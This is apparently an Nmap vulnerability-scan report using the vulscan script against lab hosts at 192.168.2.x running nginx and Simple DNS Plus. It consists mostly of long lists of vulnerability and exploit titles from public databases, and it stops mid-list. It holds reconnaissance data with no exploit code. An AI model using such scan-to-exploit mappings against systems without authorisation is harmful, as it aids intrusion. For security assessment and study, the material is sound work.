LoginGraceTime DoS [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness [9550] OpenSSH scp Traversal Arbitrary File Overwrite [6601] OpenSSH *realloc() Unspecified Memory Errors [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow [6073] OpenSSH on FreeBSD libutil Arbitrary File Read [6072] OpenSSH PAM Conversation Function Stack Modification [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass [5408] OpenSSH echo simulation Information Disclosure [5113] OpenSSH NIS YP Netgroups Authentication Bypass [4536] OpenSSH Portable AIX linker Privilege Escalation [3938] OpenSSL and OpenSSH /dev/random Check Failure [3456] OpenSSH buffer_append_space() Heap Corruption [2557] OpenSSH Multiple Buffer Management Multiple Overflows [2140] OpenSSH w/ PAM Username Validity Timing Attack [2112] OpenSSH Reverse DNS Lookup Bypass [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness [1853] OpenSSH Symbolic Link 'cookies' File Removal [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow [730] OpenSSH Channel Code Off by One Remote Privilege Escalation [688] OpenSSH UseLogin Environment Variable Local Command Execution [642] OpenSSH Multiple Key Type ACL Bypass [504] OpenSSH SSHv2 Public Key Authentication Bypass [341] OpenSSH UseLogin Local Privilege Escalation
53	tcp	open	domain	syn-ack			generic dns response: NOTIMP
80	tcp	open	http	syn-ack	nginx
	http-csrf	Couldn't find any CSRF vulnerabilities.
	http-stored-xss	Couldn't find any stored XSS vulnerabilities.
	http-vuln-cve2013-7091	ERROR: Script execution failed (use -d to debug)
	vulscan	VulDB - https://vuldb.com: [176405] Nginx up to 1.13.5 Autoindex Module integer overflow [176114] Nginx Controller up to 3.6.x Agent Configuration File agent.conf permission [176113] Nginx Controller up to 3.9.x NAAS API Key Generation random values [176112] Nginx Controller up to 2.8.x/3.14.x systemd.txt insertion of sensitive information into sent data [176111] Nginx Controller up to 3.3.x Intra-Cluster Communication cleartext transmission [176110] Nginx Open Source/Plus/Ingress Controller Resolver off-by-one [171030] ExpressVPN Router 1 Nginx Webserver integer overflow [160163] Cloud Foundry Routing Nginx denial of service [159138] Kubernetes up to 0.27.x ingress-nginx privilege escalation [157631] Nginx Controller up to 1.0.1/2.8.x/3.4.x Kubernetes Package Download HTTP weak encryption [157630] Nginx Controller up to 1.0.1/2.8.x/3.4.x NATS Messaging System weak authentication [157629] Nginx Controller up to 1.0.1/2.8.x/3.4.x User Interface weak authentication [157572] Nginx Controller up to 3.4.0 API Endpoint Reflected cross site scripting [157571] Nginx Controller up to 1.0.1/2.9.0/3.4.0 User Interface cross site request forgery [155282] nginx up to 1.18.0 privilege escalation [154857] Nginx Controller up to 3.3.0 Web Server Logout weak authentication [154326] Nginx Controller up to 3.2.x Agent Installer Script install.sh privilege escalation [154324] Nginx Controller up to 3.2.x Postgres Database Server information disclosure [154323] Nginx Controller up to 3.1.x TLS weak authentication [152728] strong-nginx-controller up to 1.0.2 _nginxCmd privilege escalation [152416] Nginx Controller up to 3.1.x Controller API privilege escalation [148519] nginx up to 1.17.6 Error Page privilege escalation [145942] nginx 0.8.40 HTTP Proxy Module privilege escalation [144114] Xiaomi Mi WiFi R3G up to 2.28.22 Nginx Alias account directory traversal [133852] Sangfor Sundray WLAN Controller up to 3.7.4.2 Cookie Header nginx_webconsole.php privilege escalation [132132] SoftNAS Cloud 4.2.0/4.2.1 Nginx privilege escalation [131858] Puppet Discovery up to 1.3.x Nginx Container weak authentication [130644] Nginx Unit up to 1.7.0 Router Process memory corruption [127759] VeryNginx 0.3.3 Web Application Firewall 7PK Security Features [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module information disclosure [126524] nginx up to 1.14.0/1.15.5 HTTP2 denial of service [126523] nginx up to 1.14.0/1.15.5 HTTP2 denial of service [103517] nginx up to 1.13.2 Range Filter memory corruption [89849] nginx RFC 3875 Namespace Conflict privilege escalation [87719] nginx up to 1.11.0 ngx_files.c ngx_chain_to_iovec denial of service [80760] nginx 0.6.18/1.9.9 DNS CNAME Record denial of service [80759] nginx 0.6.18/1.9.9 DNS CNAME Record memory corruption [80758] nginx 0.6.18/1.9.9 DNS UDP Packet denial of service [65364] nginx up to 1.1.13 Default Configuration privilege escalation [61434] nginx 1.2.0/1.3.0 on Windows Access Restriction privilege escalation [59645] nginx up to 0.8.9 memory corruption [53592] nginx 0.8.36 privilege escalation [53590] nginx up to 0.8.9 information disclosure [51533] nginx 0.7.64 Terminal privilege escalation [50905] nginx up to 0.8.9 directory traversal [50903] nginx up to 0.8.10 memory corruption [50043] nginx up to 0.8.10 memory corruption [67677] nginx up to 1.7.3 SSL privilege escalation [67296] nginx up to 1.7.3 SMTP Proxy ngx_mail_smtp_starttls privilege escalation [12824] nginx 1.5.10 on 32-bit SPDY memory corruption [12822] nginx up to 1.5.11 SPDY memory corruption [11237] nginx up to 1.5.6 URI String privilege escalation [8671] nginx up to 1.4 proxy_pass privilege escalation [8618] nginx 1.3.9/1.4.0 http/ngx_http_parse.c ngx_http_parse_chunked Numeric Error [7247] nginx 1.2.6 Proxy Function weak authentication [5293] nginx up to 1.1.18 ngx_http_mp4_module memory corruption [4843] nginx up to 1.0.13/1.1.16 HTTP Header Response Parser ngx_http_parse.c denial of service MITRE CVE - https://cve.mitre.org: [CVE-2013-2070] http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028. [CVE-2013-2028] The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow. [CVE-2012-3380] Directory traversal vulnerability in naxsi-ui/nx_extract.py in the Naxsi module before 0.46-1 for Nginx allows local users to read arbitrary files via unspecified vectors. [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file. [CVE-2012-1180] Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request. [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request. [CVE-2011-4315] Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response. [CVE-2010-2266] nginx 0.8.36 allows remote attackers to cause a denial of service (crash) via certain encoded directory traversal sequences that trigger memory corruption, as demonstrated using the "%c0.%c0." sequence. [CVE-2010-2263] nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI. [CVE-2009-4487] nginx 0.7.64 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator. [CVE-2009-3898] Directory traversal vulnerability in src/http/modules/ngx_http_dav_module.c in nginx (aka Engine X) before 0.7.63, and 0.8.x before 0.8.17, allows remote authenticated users to create or overwrite arbitrary files via a .. (dot dot) in the Destination HTTP header for the WebDAV (1) COPY or (2) MOVE method. [CVE-2009-3896] src/http/ngx_http_parse.c in nginx (aka Engine X) 0.1.0 through 0.4.14, 0.5.x before 0.5.38, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.14 allows remote attackers to cause a denial of service (NULL pointer dereference and worker process crash) via a long URI. [CVE-2009-2629] Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests. SecurityFocus - https://www.securityfocus.com/bid/: [99534] Nginx CVE-2017-7529 Remote Integer Overflow Vulnerability [93903] Nginx CVE-2016-1247 Remote Privilege Escalation Vulnerability [91819] Nginx CVE-2016-1000105 Security Bypass Vulnerability [90967] nginx CVE-2016-4450 Denial of Service Vulnerability [82230] nginx Multiple Denial of Service Vulnerabilities [78928] Nginx CVE-2010-2266 Denial-Of-Service Vulnerability [70025] nginx CVE-2014-3616 SSL Session Fixation Vulnerability [69111] nginx SMTP Proxy Remote Command Injection Vulnerability [67507] nginx SPDY Implementation CVE-2014-0088 Arbitrary Code Execution Vulnerability [66537] nginx SPDY Implementation Heap Based Buffer Overflow Vulnerability [63814] nginx CVE-2013-4547 URI Processing Security Bypass Vulnerability [59824] Nginx CVE-2013-2070 Remote Security Vulnerability [59699] nginx 'ngx_http_parse.c' Stack Buffer Overflow Vulnerability [59496] nginx 'ngx_http_close_connection()' Remote Integer Overflow Vulnerability [59323] nginx NULL-Byte Arbitrary Code Execution Vulnerability [58105] Nginx 'access.log' Insecure File Permissions Vulnerability [57139] nginx CVE-2011-4968 Man in The Middle Vulnerability [55920] nginx CVE-2011-4963 Security Bypass Vulnerability [54331] Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability [52999] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability [52578] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability [50710] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability [40760] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities [40434] nginx Space String Remote Source Code Disclosure Vulnerability [40420] nginx Directory Traversal Vulnerability [37711] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability [36839] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities [36438] nginx Proxy DNS Cache Domain Spoofing Vulnerability [36384] nginx HTTP Request Remote Buffer Overflow Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [84623] Phusion Passenger gem for Ruby with nginx configuration insecure permissions [84172] nginx denial of service [84048] nginx buffer overflow [83923] nginx ngx_http_close_connection() integer overflow [83688] nginx null byte code execution [83103] Naxsi module for Nginx naxsi_unescape_uri() function security bypass [82319] nginx access.log information disclosure [80952] nginx SSL spoofing [77244] nginx and Microsoft Windows request security bypass [76778] Naxsi module for Nginx nx_extract.py directory traversal [74831] nginx ngx_http_mp4_module.c buffer overflow [74191] nginx ngx_cpystrn() information disclosure [74045] nginx header response information disclosure [71355] nginx ngx_resolver_copy() buffer overflow [59370] nginx characters denial of service [59369] nginx DATA source code disclosure [59047] nginx space source code disclosure [58966] nginx unspecified directory traversal [54025] nginx ngx_http_parse.c denial of service [53431] nginx WebDAV component directory traversal [53328] Nginx CRC-32 cached domain name spoofing [53250] Nginx ngx_http_parse_complex_uri() function code execution Exploit-DB - https://www.exploit-db.com: [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow [25499] nginx 1.3.9-1.4.0 DoS PoC [24967] nginx 0.6.x Arbitrary Code Execution NullByte Injection [14830] nginx 0.6.38 - Heap Corruption Exploit [13822] Nginx <= 0.7.65 / 0.8.39 (dev) Source Disclosure / Download Vulnerability [13818] Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities [12804] nginx [engine x] http server <= 0.6.36 Path Draversal [9901] nginx 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14 PoC [9829] nginx 0.7.61 WebDAV directory traversal OpenVAS (Nessus) - http://www.openvas.org: [864418] Fedora Update for nginx FEDORA-2012-3846 [864310] Fedora Update for nginx FEDORA-2012-6238 [864209] Fedora Update for nginx FEDORA-2012-6411 [864204] Fedora Update for nginx FEDORA-2012-6371 [864121] Fedora Update for nginx FEDORA-2012-4006 [864115] Fedora Update for nginx FEDORA-2012-3991 [864065] Fedora Update for nginx FEDORA-2011-16075 [863654] Fedora Update for nginx FEDORA-2011-16110 [861232] Fedora Update for nginx FEDORA-2007-1158 [850180] SuSE Update for nginx openSUSE-SU-2012:0237-1 (nginx) [831680] Mandriva Update for nginx MDVSA-2012:043 (nginx) [802045] 64-bit Debian Linux Rootkit with nginx Doing iFrame Injection [801636] nginx HTTP Request Remote Buffer Overflow Vulnerability [103470] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability [103469] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability [103344] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability [100676] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities [100659] nginx Directory Traversal Vulnerability [100658] nginx Space String Remote Source Code Disclosure Vulnerability [100441] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability [100321] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability [100277] nginx Proxy DNS Cache Domain Spoofing Vulnerability [100276] nginx HTTP Request Remote Buffer Overflow Vulnerability [100275] nginx WebDAV Multiple Directory Traversal Vulnerabilities [71574] Gentoo Security Advisory GLSA 201206-07 (nginx) [71308] Gentoo Security Advisory GLSA 201203-22 (nginx) [71297] FreeBSD Ports: nginx [71276] FreeBSD Ports: nginx [71239] Debian Security Advisory DSA 2434-1 (nginx) [66451] Fedora Core 11 FEDORA-2009-12782 (nginx) [66450] Fedora Core 10 FEDORA-2009-12775 (nginx) [66449] Fedora Core 12 FEDORA-2009-12750 (nginx) [64924] Gentoo Security Advisory GLSA 200909-18 (nginx) [64912] Fedora Core 10 FEDORA-2009-9652 (nginx) [64911] Fedora Core 11 FEDORA-2009-9630 (nginx) [64894] FreeBSD Ports: nginx [64869] Debian Security Advisory DSA 1884-1 (nginx) SecurityTracker - https://www.securitytracker.com: [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents OSVDB - http://www.osvdb.org: [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow [92796] nginx ngx_http_close_connection Function Crafted r-&gt [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution [90518] nginx Log Directory Permission Weakness Local Information Disclosure [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow [80124] nginx HTTP Header Response Parsing Freed Memory Information Disclosure [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS [65294] nginx on Windows Encoded Space Request Remote Source Disclosure [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [62617] nginx Internal DNS Cache Poisoning Weakness [61779] nginx HTTP Request Escape Sequence Terminal Command Injection [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write [58128] nginx ngx_http_parse_complex_uri() Function Underflow [44447] nginx (engine x) msie_refresh Directive Unspecified XSS [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal [44443] nginx (engine x) rtsig Method Signal Queue Overflow [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow
	http-dombased-xss	Couldn't find any DOM based XSS.
	http-passwd	ERROR: Script execution failed (use -d to debug)
443	tcp	open	https	syn-ack
	http-csrf	Couldn't find any CSRF vulnerabilities.
	http-stored-xss	Couldn't find any stored XSS vulnerabilities.
	http-dombased-xss	Couldn't find any DOM based XSS.
	http-server-header	nginx
	http-fileupload-exploiter	Couldn't find a file-type field.
	http-enum	/manifest.json: Manifest JSON File

Misc Metrics (click to expand)

192.168.2.2(online)

Address

192.168.2.2 (ipv4)
00:0C:29:57:80:1F - VMware (mac)

Ports

The 988 ports scanned but not shown below are in state: filtered

988 ports replied with: no-response

Port		State (toggle closed [0] \| filtered [0])	Service	Reason	Product	Version	Extra info
53	tcp	open	domain	syn-ack	Simple DNS Plus
	vulscan	VulDB - https://vuldb.com: [176208] CMS Made Simple 2.2.14 Setting News Module cross site scripting [176110] Nginx Open Source/Plus/Ingress Controller Resolver off-by-one [176066] radsecproxy up to 1.8 Peer Discovery DNS Record naptr-eduroam.sh injection [175288] Store Locator Plus Plugin up to 5.5.15 on WordPress Endpoint cross site scripting [175287] Store Locator Plus Plugin up to 5.5.14 on WordPress Meta Data privileges management [174499] The Plus Addons for Elementor Page Builder Lite Plugin Widget cross site scripting [174112] IBM Spectrum Protect Plus 10.1.6/10.1.7 File Systems Agent log file [174110] IBM Spectrum Protect Plus up to 10.1.7 inadequate encryption [173898] IBM Spectrum Protect Plus up to 10.1.7 Domain Name unknown vulnerability [172921] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172916] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172683] dnsmasq up to 2.84 Port security check for standard [172435] Plus Addons for Elementor Page Builder Plugin up to 4.1.6 on WordPress improper authentication [171987] CMS Made Simple up to 2.2.15 Title Field /admin/addbookmark.php cross site scripting [171923] FreeBSD up to 11.4/12.1/12.2 DNSSL Option buffer overflow [171716] Cisco IOS XE DNS ALG denial of service [171712] Cisco Aironet mDNS Gateway denial of service [171000] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170999] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170998] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170997] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170996] Microsoft Windows Server 20H2 up to Server 2019 DNS Server code injection [170995] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170994] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170646] Node.js up to 10.23.x/12.20.x/14.15.x/15.9.x DNS Server /etc/hosts dns rebinding [170579] IBM Cloud APM 8.1.4 DNS Query name resolution [169913] F5 BIG-IP DNS/BIG-IP GTM up to 11.6.x/12.1.x/13.1.0.3 big3d buffer overflow [169679] IBM Spectrum Protect Plus up to 10.1.7 resource consumption [169499] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [169329] Red Hat Enterprise Linux dnsmasq access control [169162] Zoho ManageEngine Remote Access Plus 10.0.259 User Administration Screen userMgmt.do injection [168494] Dnsmasq up to 2.82 rfc1035.c extract_name heap-based overflow [168493] Dnsmasq up to 2.82 Pending Request security check for standard [168492] Dnsmasq up to 2.82 rfc1035.c extract_name heap-based overflow [168491] Dnsmasq up to 2.82 RRSets Sort heap-based overflow [168478] Dnsmasq up to 2.82 DNS Cache forward.c reply_query unknown vulnerability [168477] Dnsmasq up to 2.82 DNS Cache forward.c reply_query security check for standard [168476] Dnsmasq up to 2.82 DNSSEC rfc1035.c extract_name heap-based overflow [168027] Simple Board Job Plugin up to 2.9.3 on WordPress pathname traversal [167516] IBM Spectrum Protect Plus up to 10.1.0/10.1.6 VDAP Proxy information disclosure [167515] IBM Spectrum Protect Plus <=10.1.0 up to 10.1.6 Session password recovery [167514] IBM Spectrum Protect Plus <=10.1.0 up to 10.1.6 clickjacking [167513] IBM Spectrum Protect Plus <=10.1.0 up to 10.1.6 HTTP Host Header cross site scripting [167512] IBM Spectrum Protect Plus <=10.1.0 up to 10.1.6 URL information disclosure [167511] IBM Spectrum Protect Plus <=10.1.0 up to 10.1.6 permission [162200] PowerDNS Authoritative up to 4.3.0 GSS-TSIG Signature denial of service [162149] GetSimple CMS 3.3.16 Settings Page Persistent cross site scripting [162148] CMS Made Simple 2.2.14 Content Manager Persistent cross site scripting [162118] CMS Made Simple up to 2.2.14 moduleinterface.php cross site scripting [162060] SonicWALL SSL VPN DNS information disclosure [161954] cPanel up to 90.0.9 WHM Edit DNS Zone Interface cross site scripting [161953] cPanel up to 88.0.12 DNS Zone Manager DNSSEC Interface cross site scripting [161950] cPanel up to 88.0.2 PowerDNS API Key weak encryption [161869] Cisco IOS/IOS XE Split DNS privilege escalation [161860] Cisco IOS XE mDNS privilege escalation [161280] IBM Spectrum Protect Plus up to 10.1.6 directory traversal [161279] IBM Spectrum Protect Plus up to 10.1.6 Administrative Console privilege escalation [160920] Microsoft Windows up to Server 2019 DNS denial of service [160873] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160869] Microsoft Windows up to Server 2019 DNS privilege escalation [160864] Microsoft Windows up to Server 2019 Active Directory integrated DNS privilege escalation [160863] Microsoft Windows up to Server 2019 Active Directory integrated DNS memory corruption [160862] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160587] GetSimple CMS 3.3.16 Login Portal admin/index.php Reflected cross site scripting [160483] Zoho ManageEngine Exchange Reporter Plus weak authentication [159935] CMS Made Simple 2.2.14 File Manager privilege escalation [157873] SRS Simple Hits Counter Plugin 1.0.3/1.0.4 on WordPress sql injection [157772] Palo Alto PAN-OS up to 9.1.2 dnsproxyd memory corruption [157538] PowerDNS Recursor up to 4.1.16/4.2.2/4.3.1 Web Server privilege escalation [157408] Reportexpress ProPlus Config File unknown vulnerability [157335] IBM Spectrum Protect Plus up to 10.1.5 weak encryption [157040] CMS Made Simple 2.2.14 moduleinterface.php cross site scripting [156765] IBM Spectrum Protect Plus up to 10.1.5 Log File weak encryption [156764] IBM Spectrum Protect Plus up to 10.1.5 privilege escalation [156763] IBM Spectrum Protect Plus up to 10.1.5 Administrative Console privilege escalation [156762] IBM Spectrum Protect Plus up to 10.1.5 Incomplete Fix CVE-2020-4211 privilege escalation [156760] IBM Spectrum Protect Plus up to 10.1.5 weak authentication [156276] D-Link DSL 2730-U/DIR-600M DNS Resolver privilege escalation [155671] CMS Made Simple up to 2.2.14 File Picker Profile Name cross site scripting [155427] PowerDNS Recursor up to 4.3.0 SOA SyncRes::processAnswer privilege escalation [155423] PowerDNS Recursor up to 4.1.15/4.2.1/4.3.0 Recursive Query Amplification denial of service [155420] PowerDNS Recursor up to 4.3.0 gethostname information disclosure [155199] simple-file-list Plugin up to 4.2.7 on WordPress directory traversal [154802] Cisco ASA/Firepower Threat Defense DNS over IPv6 Packet Processor privilege escalation [154727] IBM Spectrum Protect Plus up to 10.1.5 directory traversal [153264] Microsoft Windows up to Server 2019 DNS denial of service [153262] Microsoft Office 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [153253] Microsoft Office 365 ProPlus Excel memory corruption [152827] WP Lead Plus X Plugin up to 0.98 on WordPress c37_wpl_import_template cross site scripting [152826] WP Lead Plus X Plugin up to 0.98 on WordPress wp_ajax_core37_lp_save_page cross site scripting [152477] IBM Spectrum Protect Plus up to 10.1.5 privilege escalation [152476] IBM Spectrum Protect Plus up to 10.1.5 privilege escalation [152475] IBM Spectrum Protect Plus up to 10.1.5 directory traversal [152469] IBM Spectrum Protect Plus up to 10.1.5 privilege escalation [152468] IBM Spectrum Protect Plus up to 10.1.5 weak authentication [152467] IBM Spectrum Protect Plus up to 10.1.5 privilege escalation [151940] Simple Link Directory Plugin up to 7.3.4 on WordPress qcopd-shortcode-generator.php get_the_title cross site scripting [151936] Simple Machines Forum up to 2.0.16 Subs-Package.php privilege escalation [151921] CMS Made Simple 2.2.13 Filemanager php.jpegd privilege escalation [151920] CMS Made Simple 2.2.13 Filemanager moduleinterface.php Stored cross site scripting [151846] Zoho ManageEngine Remote Access Plus 10.0.258 User Permission privilege escalation [151758] cPanel up to 84.0.19 PowerDNS privilege escalation [151166] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 Word memory corruption [151089] Microsoft Office 365 ProPlus/2019 for Mac Word memory corruption [151087] Microsoft Office 365 ProPlus/2016 for Mac Word memory corruption [151086] Microsoft Office 365 ProPlus/2013 RT SP1/2013 SP1/2016/2019 Word memory corruption [150979] D-Link DIR-825 Rev.B 2.10 dns_query.cgi privilege escalation [150867] Cisco Webex Meetings Client on macOS mDNS information disclosure [150470] IBM Spectrum Protect Plus 10.1.0/10.1.5 HTTP privilege escalation [150469] IBM Spectrum Protect Plus 10.1.0/10.1.5 HTTP privilege escalation [150468] IBM Spectrum Protect Plus 10.1.0/10.1.5 HTTP privilege escalation [150467] IBM Spectrum Protect Plus 10.1.0/10.1.5 HTTP privilege escalation [150466] IBM Spectrum Protect Plus 10.1.0/10.1.5 HTTP privilege escalation [150462] IBM Spectrum Protect Plus 10.1.0/10.5.0 information disclosure [150336] phpMyChat-Plus 1.98 deluser.php sql injection [150276] Zoho ManageEngine Remote Access Plus 10.0.447 Mail Server Test privilege escalation [149918] Microsoft Office 365 ProPlus OLicenseHeartbeat privilege escalation [149657] NextCloud 16 DNS privilege escalation [149606] Zoho ManageEngine Remote Access Plus up to 10.0 Credential Manager Credentials information disclosure [149223] Simple Machines Forum up to 2.0.15 information disclosure [148619] Microsoft Office 365 ProPlus Excel memory corruption [148374] Dnsmasq up to 2.80 information disclosure [147566] phpMyChat-Plus 1.98 Password Reset URL pass_reset.php Reflected cross site scripting [146921] Samba up to 4.9.16/4.10.10/4.11.2 AD Handleer ldb_qsort/dns_name_compare information disclosure [146139] PowerDNS up to 4.1.9 privilege escalation [146136] OpenStack Designate DNS Protocol denial of service [145852] F5 BIG-IP/BIG-IQ/iWorkflow/Enterprise Manager Configuration Utility DNS Rebinding privilege escalation [145401] Microsoft Office 365 ProPlus/2019 ClickToRun Security Feature privilege escalation [144968] ISC BIND DNS Response Rate Cache Poisoning weak authentication [144967] Python PIP up to 1.4 DNS Query weak authentication [144739] CUJO Smart Firewall 7003 mdnscap denial of service [144434] RouterOS up to 6.44.5/6.45.6 DNS Server privilege escalation [144433] RouterOS up to 6.44.5/6.45.6 DNS Cache Poisoning weak authentication [144062] Easy Digital Downloads Simple Shipping Extension up to <=1.8.6 on WordPress cross site scripting [143551] CMS Made Simple 2.2.11 News Screen Stored cross site scripting [143550] CMS Made Simple 2.2.11 File Manager Stored cross site scripting [143294] ISC BIND up to 9.11.6-S1 EDNS Client Subnet privilege escalation [143199] ISC BIND up to 9.10.8-P1/9.11.5-P1/9.12.3-P1 EDNS Option denial of service [143001] buddypress-activity-plus Plugin up to 1.6.1 on WordPress wp-admin/admin-ajax.php cross site request forgery [142984] CMS Made Simple 2.2.11 Module Manager cross site scripting [142957] joyplus-cms 1.6.0 manager/admin_pic.php directory traversal [142097] joyplus-cms 1.6.0 admin_ajax.php cross site request forgery [142058] auto-thickbox-plus Plugin up to 1.9 on WordPress download.min.php cross site scripting [141807] GetSimple CMS 3.3.15 admin/theme-edit.php Persistent cross site scripting [141732] Ultra Simple Paypal Shopping Cart up to 4.4 on WordPress cross site request forgery [141207] ConvertPlus Plugin up to 3.4.4 on WordPress Account Creation privilege escalation [141177] simple-mail-address-encoder Plugin up to 1.6 on WordPress Reflected cross site scripting [141162] simple-301-redirects-addon-bulk-uploader Plugin up to 1.2.4 on WordPress Redirect [141160] wp-private-content-plus Plugin up to 1.x on WordPress Settings save_settings_page 7PK Security Features [141056] simple-301-redirects-addon-bulk-uploader Plugin up to 1.2.4 on WordPress 301 Redirect [140984] UpdraftPlus Plugin up to 1.13.4 on WordPress Log cross site scripting [140964] UpdraftPlus Plugin up to 1.9.63 on WordPress add_query_arg/remove_query_arg cross site scripting [140779] trust-dns-proto Crate up to 0.5.0-alpha.2 on Rust DNS Message Compression memory corruption [140749] proxystatistics Module up to 3.0.x on SimpleSAMLphp DatabaseCommand.php sql injection [140681] wp-support-plus-responsive-ticket-system Plugin up to 9.1.1 on WordPress privilege escalation [140629] simple-login-log Plugin up to 1.1.1 on WordPress sql injection [140625] wp-support-plus-responsive-ticket-system Plugin up to 7.0.x on WordPress Ticket Number privilege escalation [140598] wp-support-plus-responsive-ticket-system Plugin up to 4.0 on WordPress privilege escalation [140597] wp-support-plus-responsive-ticket-system Plugin up to 4.1 on WordPress directory traversal [140596] wp-support-plus-responsive-ticket-system Plugin up to 4.1 on WordPress weak authentication [140595] wp-support-plus-responsive-ticket-system Plugin up to 4.1 on WordPress Path information disclosure [140594] wp-support-plus-responsive-ticket-system Plugin up to 4.1 on WordPress sql injection [140039] simple-login-log Plugin up to 1.1.1 on WordPress sql injection [140029] simple-membership Plugin up to 3.3.2 on WordPress cross site request forgery [140028] simple-add-pages-or-posts Plugin up to 1.6 on WordPress cross site request forgery [140014] simple-fields Plugin up to 1.1 on WordPress Admin Interface cross site request forgery [139904] Microsoft Word 365 ProPlus/2016/2019 memory corruption [139903] Microsoft Office 365 ProPlus/2010 SP2/2013 